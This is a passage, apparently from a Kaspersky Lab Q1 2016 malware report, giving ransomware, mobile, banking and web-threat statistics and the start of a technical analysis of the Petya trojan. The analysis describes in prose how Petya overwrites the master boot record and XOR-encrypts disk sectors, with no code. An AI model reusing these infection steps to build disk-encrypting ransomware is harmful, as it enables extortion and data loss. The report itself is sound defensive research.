At this stage, the only thing that distinguishes Petya from other ransomware is the fact that it operates without an Internet connection. This is hardly surprising though, because Petya basically “eats” the operating system, including its ability to connect to the Internet. This means the user has to go to another computer to pay the ransom and recover their data.

In March, yet another encryptor for Mac OS X was discovered – Trojan-Ransom.OSX.KeRanger. The attackers used it to infect two BitTorrent client installers from the open source Transmission project, which were available for download on their official website. Most likely, the project site was hacked, and the files for download were substituted for malicious recompiled versions. The KeRanger Apple encryptor was signed with a valid Apple certificate, and could therefore bypass the Gatekeeper security feature.

Statistics on Trojan encryptors

Encryptors belong to the Trojan-Ransom class of malware, i.e. to ransomware. Today, in addition to encryptors this class of malicious programs also includes so-called browser ransomware. In the general flow of Trojan-Ransom detections the share of browser ransomware accounts for 25%, and that is mainly in Russia and the CIS. In this section, we will not dwell on browser ransomware, but will look at malicious encryptors in more detail.

The number of new Trojan-Ransom encryptors

The following graph represents the rise in the number of newly created encryptor modifications over the last two quarters.

Number of Trojan-Ransom encryptor modifications in Kaspersky Lab’s Virus Collection (Q4 2015 vs Q1 2016)

The overall number of encryptor modifications in our Virus Collection to date is at least 15,000. Nine new encryptor families and 2,900 new modifications were detected in Q1.

The number of users attacked by encryptors

Number of users attacked by Trojan-Ransom encryptor malware (Q1 2016)

In Q1 2016, 372,602 unique users were attacked by encryptors, which is 30% more than in the previous quarter. Approximately 17% of those attacked were in the corporate sector.

It is important to keep in mind that the real number of incidents is several times higher: the statistics reflect only the results of signature-based and heuristic detections, while in most cases Kaspersky Lab products detect encryption Trojans based on behavior recognition models and issue the Generic verdict, which does not distinguish the types of malicious software.

Top 10 countries attacked by encryptors Country* % of users attacked by encryptors** 1 Italy 3.06 2 Netherlands 1.81 3 Belgium 1.58 4 Luxembourg 1.36 5 Bulgaria 1.31 6 Croatia 1.16 7 Rwanda 1.15 8 Lebanon 1.13 9 Japan 1.11 10 Maldives 1.11

* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by Trojan-Ransom encryptor malware as a percentage of all unique users of Kaspersky Lab products in the country.

In Q1, the first six places in the Top 10 were occupied by European countries. Italy (3.06%) topped the rating; the most widespread encryptor family in this country was Teslacrypt (Trojan-Ransom.Win32.Bitman). Italy was followed by the Netherlands (1.81%) and Belgium (1.58%).

Top 10 most widespread encryptor families Name Verdict* Percentage of users** 1 Teslacrypt Trojan-Ransom.Win32.Bitman/Trojan-Ransom.JS.Cryptoload 58.43% 2 CTB-Locker Trojan-Ransom.Win32.Onion/Trojan-Ransom.NSIS.Onion 23.49% 3 Cryptowall / Cryptodef Trojan-Ransom.Win32.Cryptodef 3.41% 4 Cryakl Trojan-Ransom.Win32.Cryakl 3.22% 5 Scatter Trojan-Ransom.BAT.Scatter/Trojan-Downloader.JS.Scatter/Trojan-Dropper.JS.Scatter/Trojan-Ransom.Win32.Scatter 2.47% 6 Rakhni Trojan-Ransom.Win32.Rakhni/Trojan-Downloader.Win32.Rakhni 1.86% 7 Locky Trojan-Ransom.Win32.Locky 1.30% 8 Shade Trojan-Ransom.Win32.Shade 1.21% 9 iTorLock / Troli Trojan-Ransom.MSIL.Lortok 0.84% 10 Mor / Gulcrypt Trojan-Ransom.Win32.Mor 0.78%

* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

First place in Q1 was occupied by the Teslacrypt family represented by two verdicts: Trojan-Ransom.Win32.Bitman and Trojan-Ransom.JS.Cryptoload. The second verdict is typical for scripts that are sent out in ZIP archives as part of spam mailings. In the past, these scripts downloaded malware such as Fareit and Cryptowall, but recently the attackers have switched to TeslaCrypt. Noticeably, in Q1 new versions of this encryptor with an improved encryption algorithm were spread this way: the authors used the “reliable” RSA-4096 instead of AES.

Second came the CTB-Locker (Trojan-Ransom.Win32 / NSIS.Onion) family. The members of this family are usually distributed via an affiliate program, and are supported in many languages. As mentioned above, in the first quarter of 2016, a new variant of the CTB-Locker that targets web servers only was discovered. It has already successfully encrypted web-root files in more than 70 servers located in 10 countries.

The Trojan-Ransom.Win32.Cryptodef family also known as Cryptowall came third. Its representatives, as in the case of Teslacrypt, are spread via spam mass mailings.

In fifth place is the Scatter family. Earlier this year, a new wave of proliferation involving this encryptor via spam mailings was registered. The emails contained a link to a JS script that was masked in order to make the user download and launch it locally. Interestingly, when the script runs, in addition to Scatter, it saves two other malicious programs to the disk: Nitol (DDoS-bot) and Pony (a Trojan designed to steal information, mostly passwords).

The Locky family, which occupied seventh place in the Q1 rating, was notable for its wide geographic spread, mainly across Europe. Located on the Tor network, the site containing the criminals’ demands supports more than two dozen languages, which doesn’t include Russian or other CIS languages. This may mean that cybercriminals are not interested in attacking victims in these countries, something that is confirmed by the KSN statistics.


All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Mobile threats

Cybercriminals continue to improve new techniques for deceiving users. This quarter, we identified two mobile Trojans that counter standard security mechanisms used by operating systems. One version of Trojan-Banker.AndroidOS.Asacub overlays the regular system window requesting device administrator privileges with its own window containing buttons. The Trojan thereby conceals the fact that it is gaining elevated privileges in the system from the user, and tricks the user into approving these privileges. Another Trojan using a similar method is In recent versions of Android the system asks for the user’s approval when an SMS is sent to a premium number. The Tiny SMS Trojan overlays this dialog with its own screen without covering the buttons in the original window.

Request screen of overlaying a notification about the sending of an SMS to a premium-rate number (The message states: Would you like to send a request to receive a gaming database?)

The Trojan’s request is presented in such a way that the user will most probably agree to send the SMS to a premium-rate number without having the vaguest idea of what happened next.

In the Q3 2015 report we mentioned the banking Trojan Trojan-Banker.AndroidOS.Marcher. This quarter, we were able to detect new versions of Marcher which attacked nearly 40 banking apps, mostly belonging to European banks. Unlike most other mobile Trojans, Marcher uses phishing web pages rather than its own windows to overlay banking app screens.

In Q1, we saw an increase in activity by the mobile ransomware Trojan-Ransom.AndroidOS.Fusob.pac, which blocks the user’s device and demands a ransom for decryption. In the first three months of 2016, Fusob became the most popular mobile Trojan of this type – it accounted for over 64% of users attacked by mobile ransomware. The total number of users attacked by mobile ransomware Trojans increased more than 1.8 times compared to the previous quarter.

The number of new mobile threats

In Q1 2016, Kaspersky Lab detected 2,045,323 malicious installation packages – this is 11 times greater than in Q4 2015, and 1.2 times more than in Q3 2015.

Number of detected malicious installation packages (Q2 2015 – Q1 2016)

Distribution of mobile malware by type

Distribution of new mobile malware by type, Q1 2016 vs. Q4 2015

In Q1 2016, adware programs continued to top the rating of detected malicious objects for mobile devices. The share of adware programs grew 13 p.p. compared to Q4 2015, and reached 42.7%. Notably, this is lower than in Q3 2015 (52.5%).

Second place is occupied by an SMS Trojan, and it is the second quarter in a row that we have seen a growth in the share of detections of this type of object. In Q4 2015, the share of SMS Trojans rose dramatically from 6.2% to 19.8%, and grew by another 0.7 p.p. in Q1 2016, and amounted to 20.5%.

Trojan spyware programs, with a 10% share, were right behind the SMS Trojans. These programs steal the user’s personal data, including incoming messages (mTANs) from banks.

RiskTool software, or legal applications that are potentially dangerous to users, had occupied the first or second position in this rating for nearly two years. However, starting in Q4 2015 they fell to the fifth place. In Q4 2014, there share was 5.6%, and in Q1 2016 7.4%.

The share of banking Trojans has continued to grow, and amounted to 1.2% in Q1 2016.

TOP 20 mobile malware programs

Please note that this ranking of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users* 1 DangerousObject.Multi.Generic 73.7 2 Backdoor.AndroidOS.Ztorg.c 11.3 3 Trojan.AndroidOS.Iop.c 8.9 4 Trojan.AndroidOS.Ztorg.a 8.7 5 Trojan-Ransom.AndroidOS.Fusob.pac 6.2 6 4.6 7 Trojan-Clicker.AndroidOS.Gopl.a 4.5 8 Backdoor.AndroidOS.Ztorg.b 4.3 9 Trojan.AndroidOS.Iop.m 3.7 10 Trojan.AndroidOS.Agent.ej 3.7 11 Trojan.AndroidOS.Iop.q 3.5 12 Trojan.AndroidOS.Ztorg.i 3.3 13 Trojan.AndroidOS.Muetan.b 3.1 14 3.1 15 Trojan-SMS.AndroidOS.Podec.a 3.1 16 Trojan-Downloader.AndroidOS.Leech.a 3.0 17 Trojan-Dropper.AndroidOS.Guerrilla.b 2.8 18 2.8 19 Backdoor.AndroidOS.Ztorg.a 2.8 20 Backdoor.AndroidOS.Triada.d 2.4

* Percentage of users attacked by the malware in question, relative to all users attacked

First place is occupied by DangerousObject.Multi.Generic (44.2%), used for malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

An increasing number of entries in the TOP 20 are occupied by Trojans that use advertising as their main means of monetization. Their goal is to deliver as much advertisements as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them. In Q1, 16 such programs made it into the TOP 20: three programs from the family Backdoor.AndroidOS.Ztorg, three from the family Trojan.AndroidOS.Iop, two from the family Trojan.AndroidOS.Ztorg, plus, Trojan-Clicker.AndroidOS.Gopl.a, Trojan.AndroidOS.Agent.ej, Trojan.AndroidOS.Muetan.b,, Trojan-Downloader.AndroidOS.Leech.a, Trojan-Dropper.AndroidOS.Guerrilla.b, and Backdoor.AndroidOS.Triada.d.

Backdoor.AndroidOS.Triada is a new entry in the TOP 20 of mobile malware. The main function of this Trojan is to redirect financial SMS transactions when the user makes online payments to buy additional content in legitimate apps. The money goes to the attackers rather than to the software developer. Triada is the most complex mobile malware program that we know of. Its distinctive feature is the use of the Zygote process to implement its code in the context of all the applications on the device. Triada penetrates virtually all applications running on the infected device, and continues to exist in the RAM memory only. In addition, all the Trojan’s separately launched processes are concealed from the user and other applications.

The ransomware Trojan Trojan-Ransom.AndroidOS.Fusob.pac is in fifth place (6.2%). This Trojan demands a $200 ransom from victims to unblock their devices. A substantial number of the victims are located in North America (the US and Canada) and Europe (mostly in Germany, Italy, the UK, Spain and Switzerland).

Trojan-SMS.AndroidOS.Podec.a (3%) has spent over a year now in the mobile malware TOP 20, although now it is beginning to lose ground. Earlier it was consistently among the top 5 mobile threats, but in Q1 2016 it only made it into the bottom half of the rating. The number of users attacked by this Trojan fell 1.7 times compared to Q4 2015. Its functionality has remained practically unchanged; the main means of monetization is still achieved by subscribing the user to paid services.

Also making it into the rating is, an exploit used to gain local super-user rights.

The geography of mobile threats

The geography of mobile malware infection attempts in Q1 2016 (percentage of all users attacked)

Top 10 counties attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked** 1 China 38.2 2 Bangladesh 27.6 3 Uzbekistan 21.3 4 Algeria 17.6 5 Nigeria 17,4 6 India 17.0 7 Philippines 15.7 8 Indonesia 15,6 9 Ukraine 15.0 10 Malaysia 14.0

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

China topped the ranking, with 40% of users encountering a mobile threat at least once during the year. To recap, in 2015 China also came first in the ranting.

In all the countries of the Top 10 except for China the most popular mobile malware was the same – advertising Trojans that appeared in the TOP 20 mobile malware, and AdWare. In China, a significant proportion of attacks also involved advertising Trojans, but the majority of users encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families. Representatives of the RiskTool.AndroidOS.SMSreg family were also popular. If used carelessly, these programs could result in money being withdrawn from a mobile account.

The safest countries are Taiwan (2.9%), Australia (2.7%) and Japan (0.9%).

Mobile banking Trojans

Over the reporting period, we detected 4,146 mobile Trojans, which is 1.7 times more than in the previous quarter.

Number of mobile banking Trojans detected by Kaspersky Lab solutions (Q2 2015 – Q1 2016)

Geography of mobile banking threats in Q1 2016 (number of users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we created a country ranking according to the percentage of users attacked by mobile banker Trojans.

Top 10 counties attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % users attacked** 1 China 0.45 2 Australia 0.30 3 Russia 0.24 4 Uzbekistan 0.20 5 Ukraine 0.08 6 France 0.06 7 Byelorussia 0.05 8 Turkey 0.05 9 Japan 0.03 10 Kazakhstan 0.03

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q1 2016, first place was occupied by China where the majority of affected users encountered the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families of mobile banker Trojans. In second place was Australia where the Trojan-Banker.AndroidOS.Acecard family was replaced by the Trojan-Banker.AndroidOS.Marcher family as the most popular threat.

TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users

An indication of how popular mobile banker Trojans are with cybercriminals in each country can be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the quarter, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking differs from the one above:

Country* % users attacked** 1 Australia 13.4 2 Russia 5.1 3 United Kingdom 1.6 4 Turkey 1.4 5 Austria 1.3 6 France 1.3 7 Poland 1.2 8 China 1.1 9 Hong Kong 1 10 Switzerland 0.9

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country.

To recap, Australia was among the Top 3 countries with the lowest percentage of users attacked by mobile malware. However, in this ranking Australia ended in first place: more than 13% of all users attacked by mobile malicious programs were attacked by mobile bankers. Meanwhile China, which came first in the previous ranking, ended the quarter in tenth place. In other words, in China the cybercriminals’ mobile banking Trojans are less popular than other types of mobile malware.

Mobile Trojan-Ransom

In Q1 2016, we detected 2,896 mobile ransomware samples, which is 1.4 times more than in the previous quarter.

>Number of mobile Trojan-Ransomware programs detected by Kaspersky Lab (Q2 2015 – Q1 2016)

TOP 10 countries attacked by Trojan-Ransomware as a percentage of attacked users:

Country* % of users attacked ** 1 Kazakhstan 0.92 2 Germany 0.83 3 Uzbekistan 0.80 4 Canada 0.71 5 Italy 0.67 6 Netherlands 0.66 7 United Kingdom 0.59 8 Switzerland 0.58 9 USA 0.55 10 Spain 0.36

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users attacked by mobile malware in the country.

In all the countries of the TOP 10, except for Kazakhstan and Uzbekistan, the most popular Trojan-Ransom family was Fusob, especially its Trojan-Ransom.AndroidOS.Fusob.pac modification (note, this malicious program was fifth in the ranking of mobile threats).

In Kazakhstan and Uzbekistan, which came first and third respectively, the main threat to users originated from representatives of the Small family of mobile Trojan-Ransom. This is a fairly simple ransomware program that blocks operation of a device by overlaying all the windows on the device with its own window and demands $10 to unblock it.

Vulnerable applications used by cybercriminals

In Q1 2016, exploits for Adobe Flash Player remained popular. During the reporting period two new vulnerabilities in this software were detected:

  • CVE-2015-8651
  • CVE-2016-1001

The first exploit pack to add support for these vulnerabilities was Angler.

One notable event in the first quarter was the use of an exploit for Silverlight – CVE-2016-0034. At the time of publication, this vulnerability is used by the Angler and RIG exploit packs.

As is now traditional, some popular packs included an exploit for the Internet Explorer (CVE-2015-2419) vulnerability.

The overall picture of the use of exploits in the first quarter looks as follows:

Distribution of exploits used in attacks by the type of application attacked, Q1 2016

As expected, we have seen a decline in the share of exploits for Java (-3 percentage points) and an increase in the use of Flash exploits (+1 p.p.). There was also a significant increase in the percentage of exploits for Microsoft Office (+10 p.p.): this group mainly includes exploits for vulnerabilities in Microsoft Word. This significant growth was caused by spam mailings containing these exploits.

Overall, the first quarter of 2016 continued the trend of the past few years – cybercriminals are focused on exploits for Adobe Flash Player and Internet Explorer. In our chart, the latter is included in the “Browsers” category together with detections of landing pages that “distribute” exploits.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the first quarter of 2016, Kaspersky Lab’s web antivirus detected 18,610,281 unique malicious objects: scripts, exploits, executable files, etc. 74,001,808 unique URLs were recognized as malicious by web antivirus components.

Online threats in the banking sector

In the first three months of 2016, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 459,970 computers. We are witnessing a decline in financial malware activity: the figure for Q1 is 23.3% lower than in the previous quarter (597,415). A year ago, in Q1 2015 this figure was 699,652, which translates into a 34.26% fall in the number of victims over the past year.

Number of attacks by financial users, Q1 2016

Geography of attacks

To evaluate and compare the degree of risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this type of threat during the reporting period in the country, relative to all users of our products in the county.

Geography of banking malware attacks in Q1 2016 (percentage of attacked users)

Top 10 countries by the percentage of attacked users

Country* % attacked users** 1 Brazil 3.86 2 Austria 2.09 3 Tunisia 1.86 4 Singapore 1.83 5 Russia 1.58 6 Venezuela 1.58 7 Morocco 1.43 8 Bulgaria 1.39 9 Hong Kong 1.37 10 United Arab emirates 1.30

These statistics are based on the detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q1 2016, Brazil had the highest percentage of Kaspersky Lab users who were attacked by banking Trojans. One of the reasons for the growth of financial threats in this country was the emergence of cross-platform Trojan bankers. Noticeably, most countries in the TOP 10 have a high level of technological development and/or well-developed banking system which attracts cybercriminals.

In Russia, 1.58% of users encountered a banking Trojan at least once in Q1 (an increase of 1 p.p. compared to the previous quarter). In the US, the figure was 0.26%; Spain – 0.84%; Italy – 0.79%; Germany – 0.52%; the UK – 0.48%; France – 0.36%.

The Top 10 banking malware families

The table below shows the Top 10 malware families most commonly used in Q1 2016 to attack online banking users:

Name Number of users attacked 1 Trojan-Spy.Win32.Zbot 419940 2 Trojan-Downloader.Win32.Upatre 177665 3 Trojan-Banker.Java.Agent 68467 4 Trojan-Banker.Win32.Gozi 53978 5 Trojan-Banker.Win32.BestaFera 25923 6 Trojan.Win32.Tinba 24964 7 Trojan-Banker.Win32.Banbra 22942 8 Trojan-Banker.AndroidOS.Agent 19782 9 Trojan-Banker.AndroidOS.Abacus 13446 10 Trojan-Banker.Win32.ChePro 9209

Trojan-Spy.Win32.Zbot topped the ranking. It has become a permanent resident in this ranking, and it is no coincidence that it consistently occupies a leading position. The Trojans of the Zbot family were among the first to use web injections to compromise the payment details of online banking users and to modify the contents of banking web pages. They encrypt their configuration files at several levels; the decrypted configuration file is never stored in the memory in its entirety, but is instead loaded in parts.

The Trojan-Downloader.Win32.Upatre family of malicious programs came second in Q1 2016. The malware is no larger than 3.5 KB in size, and is limited to downloading the payload to the victim computer, most typically a banker Trojan from the Dyre/Dyzap/Dyreza family. The main aim of this family of banking Trojans is to steal the user’s payment details. Dyre does this by intercepting the data from a banking session between the victim’s browser and the online banking web app, in other words, it uses the “Man-in-the-Browser” (MITB) technique.

It is worth noting that the vast majority of the TOP 10 malware uses the technique of embedding arbitrary HTML code in the web page displayed by the browser and intercepting payment data entered by the user into the original and the inserted web forms.

The TOP 3 threats in the first quarter of 2016 include cross-platform banking malware written in Java. Brazilian cybercriminals have started actively using cross-platform Java Trojans. In addition, Kaspersky Lab experts detected new malicious software also written in Java and used to steal financial information – Adwind RAT. Adwind is written entirely in Java, which is why it can attack all popular platforms: Windows, Mac OS, Linux and Android. The malicious program allows attackers to collect and extract data from the system, as well as remotely control an infected device. To date, it is able to take screenshots, memorize keystrokes, steal passwords and data stored in browsers and web forms, take photos and videos via the webcam, make audio recordings using the microphone built into the device, collect general data about the user and the system, steal VPN certificates and keys from crypto currency wallets and, finally, manage SMS.

Fourth place in the TOP 10 is occupied by Trojan-Banker.Win32.Gozi, which penetrates working processes of popular web browsers to steal payment information. Some samples of this Trojan can infect the MBR (Master Boot Record) and maintain their presence in the operating system, even if it has been reinstalled.

One of the most interesting pieces of malware designed to steal financial data that did not make it into the TOP 10 is Gootkit. It is written using the software platform NodeJS and has a modular architecture. The malicious code interpreter is contained in its body; as a result, it is big – approximately 5 MB. To steal payment data, Gootkit uses http traffic interception and embeds itself in the browser. Other standard Trojan features include execution of arbitrary commands, auto-update, and capturing screenshots. However, this banking Trojan is not particularly widespread.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2016, Kaspersky Lab solutions blocked 228,420,754 attacks launched from web resources located in 195 countries around the world. 76% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

Distribution of web attack sources by country, Q1 2016

Q1 saw the Netherlands take over first place (24.6%) from the US (21.44%). Russia (7.45%) and Germany (6%), which followed them, also swapped places. Vietnam has dropped out the Top 10, while Bulgaria is a newcomer in eighth place with 1.75%.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

Country* % of unique users attacked ** 1 Russia 36.28 2 Kazakhstan 33.19 3 China 32.87 4 Azerbaijan 30.28 5 Ukraine 29.96 6 Belarus 29.16 7 Slovenia 26.88 8 Armenia 26.27 9 Vietnam 25.14 10 Moldova 24.68 11 Kyrgyzstan 24.46 12 Spain 24.00 13 India 23.98 14 Brazil 23.68 15 Italy 22.98 16 Algeria 22.88 17 Lithuania 22.58 18 Croatia 22.04 19 Turkey 21.46 20 France 21.46

These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

The leader of this ranking remained unchanged – it is still Russia with 36.3%. Since the previous quarter, Chile, Mongolia, Bulgaria and Nepal have left the Top 20. Newcomers to the ranking are Slovenia (26.9%), India (24%) and Italy (23%).

The countries with the safest online surfing environments included Germany (17.7%), Canada (16.2%), Belgium (14.5%), Switzerland (14%), the US (12.8%), the UK (12.7%), Singapore (11.9%), Norway (11.3%), Honduras (10.7%), the Netherlands (9.6%) and Cuba (4.5%).

On average, 21.42% of computers connected to the Internet globally were subjected to at least one web attack during the three months. This is a fall of 1.5 p.p. compared to Q4 2015.

Local threats

Local infection statistics for users computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2016, Kaspersky Lab’s file antivirus detected a total of 174,547,611 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus had been triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

Country* % of unique users** 1 Somalia 66.88% 2 Yemen 66.82% 3 Armenia 65.17% 4 Kyrgyzstan 64.45% 5 Russia 64.18% 6 Tajikistan 64.06% 7 Bangladesh 63.00% 8 Vietnam 61.31% 9 Afghanistan 60.72% 10 Kazakhstan 60.62% 11 Nepal 59.60% 12 Uzbekistan 59.42% 13 Ethiopia 59.23% 14 Ukraine 58.90% 15 Byelorussia 58.51% 16 Laos 58.46% 17 Rwanda 58.10% 18 Iraq 57.16% 19 Algeria 57.50% 20 Moldova 56.93%

These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).

** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

Somalia became the new leader of this rating in Q1, with 66.9%. Bangladesh, the leader for the past few quarters, dropped to seventh place (63.6%). Newcomers to this ranking are Uzbekistan in 12th place (59.4%), Ukraine in 14th place (58.9%), Belarus in 15th place (58.5%), Iraq in 18th place (57.2%) and Moldova in 20th (57.0%).

The safest countries in terms of local infection risks were the Czech Republic (27.2%), Denmark (23.2%) and Japan (21.0%).

An average of 44.5% of computers globally faced at least one local threat during Q1 2016, which is 0.8 p.p. more than in Q4 2015.

Petya: the two-in-one trojan

Malware Alerts - Wed, 05/04/2016 - 06:39

Infecting the Master Boot Record (MBR) and encrypting files is nothing new in the world of malicious programs. Back in 1994, the virus OneHalf emerged that infected MBRs and encrypted the disk contents. However, that virus did not extort money. In 2011, MBR blocker Trojans began spreading (Trojan-Ransom.Win32.Mbro) that infected the MBR and prevented the operating system from loading further. The victim was prompted to pay a ransom to get rid of the problem. It was easy to treat a system infected by these blocker Trojans because, apart from the MBR, they usually didn’t encrypt any data on the disk.

Today, we have encountered a new threat that’s a blast from the past. The Petya Trojan (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Petr) infects the MBR preventing normal system loading, and encrypts the Master File Table (MFT), an important part of the NT file system (NTFS), thus preventing normal access to files on the hard drive.

The infection scenario

The people spreading Petya attack their potential victims by sending spam messages containing links that download a ZIP archive. The archive contains the Trojan’s executable file and a JPEG image. The file names are in German (Bewerbungsunterlagen.PDF.exe, Bewerbungsmappe-gepackt.exe), are made to look like resumes for job candidates, and target HR staff in German-speaking countries.

Contents of the archives downloaded from links in spam

The cybercriminals didn’t bother with automatic escalation of privileges – the manifest of the Trojan’s executable file contains the following standard record:

If the user launches the malicious executable file Petya, Windows will show the standard UAC request for privilege escalation. If the system has been properly configured by the system administrators (i.e. UAC is enabled, and the user is not working from an administrator account), the Trojan won’t be able to run any further.

Unfortunately, a user who has the privileges to agree to a UAC request often underestimates the potential risks associated with launching unknown software with elevated rights.

How it works The executable file and the packer

A Petya Trojan infection begins with the launch of the malicious executable file. The samples of the Trojan that Kaspersky Lab received for analysis are, just like most other malware samples, protected with a customized packer. When the executable file launches, the malicious packer’s code begins to work – it unpacks the malicious DLL Setup.dll into a newly designated RAM area, and then passes control to it.

Cybercriminals typically use packers to avoid detection – circumvent static signatures, trick the heuristic analyzer, etc. While investigating the Petya packer, we noticed an unusual trick used by the cybercriminals.

Cybercriminals often try to create the packer in such a way that a packed malicious executable file looks as similar as possible to a regular legitimate file. Sometimes, they take a legitimate file and substitute part of the code with malicious code. That’s what they did with Petya, with one interesting peculiarity: it was a part of the standard compiler-generated runtime DLL that was replaced with malicious code, while the function WinMain remained intact. The illustration below shows the transition, beginning from the entry point (“start”). As can be seen, the function of unpacking malicious code (which we dubbed “evil”) is called from the legal function __calloc_crt which is part of the runtime code.

Diagram of transitions between the malicious packer’s functions

Why do it that way? Obviously, the creators of the malicious packer were trying to trick an inattentive researcher or automatic analyzers: the file looks legitimate – WinMain doesn’t contain malicious code – so it’s possible that it will be overlooked. Besides, if the breakpoint is set at WinMain during debugging, then the malicious code works (and sends the system into BSOD, as we will discuss later in detail) and execution is over before the breakpoint is even reached.

Kaspersky Lab has detected Petya samples that masquerade as legitimate files written in C/C++ and in Delphi.

The malicious DLL

Setup.dll is a DLL with just one export: _ZuWQdweafdsg345312@0. It is written in C and compiled in Microsoft Visual Studio. The cybercriminals used an implementation of cryptographic algorithms available in the public library mbedtls (formerly polarssl). Setup.dll is not saved to the hard drive as a separate file, but always remains in the RAM.

When Setup.dll receives control, it decrypts the data contained in the section ‘.xxxx’ and then proceeds to infect the victim computer.

The encrypted ‘.xxxx’ section containing data

Fragment of the decrypted data from the ‘.xxxx’ section

At a higher degree of abstraction, the actions of Setup.dll come down to the following:

  1. Re-write the boot record on the hard drive with its own malicious loader;
  2. Generate a key, infection ID and other auxiliary information, and save them to the hard drive;
  3. Cause a system abort and reboot, thereby passing control to the malicious loader.

Now let’s look in detail at how all of this is implemented in the Trojan. But before doing so, we need to define the terminology used.

Hard disk sector – the minimum addressable unit of a hard drive, typically 512 bytes.

Master boot record (MBR) – the code and the data written to Sector 0. After hardware is initialized, this code is used to boot the PC. Also, this sector contains the hard disks’ partition table. A disk partitioned with MBR may have up to four primary partitions, and the maximum partition size is ~2.2 TB.

GUID Partition Table (GPT) – a more modern standard of hard drive layout. It supports up to 128 partitions, each up to 9.4 ZB in size (1 ZB = 1021 bytes.)

Now let’s return to the Trojan under review. Setup.dll can infect disks partitioned according to either the older MBR standard or the more modern GPT standard. There are two alternative branches of execution sequences in the malicious program; the choice of execution branch depends on the data in the field PartitionStyle of the structure PARTITION_INFORMATION_EX.

Selection of the execution branch for disk infection, depending on whether the disk has MBR or GPT partitioning

Infecting an MBR disk

When infecting an MBR disk, Setup.dll performs the following actions:

  1. Encrypts sector 0 (the original code and the MBR data) with the simple operation XOR 0x37 (ASCII ‘7’), writes the result to sector 56;
  2. Encrypts sectors 1-33 with the same operation XOR 0x37;
  3. Generates configuration data for the malicious loader, writes them to sector 54;
  4. Creates the verification sector 55 populated with the repeating byte 0x37;
  5. Copies the disk’s NT signature and the partition table saved from the original MBR into its own first-level loader; writes first-level malicious code to sector 0 of the disk, and writes second-level code to sectors 34-50 (referred to here as the malicious loader);
  6. Calls the function NtRaiseHardError, which causes the operating system to crash (BSOD – the ‘blue screen of death’).

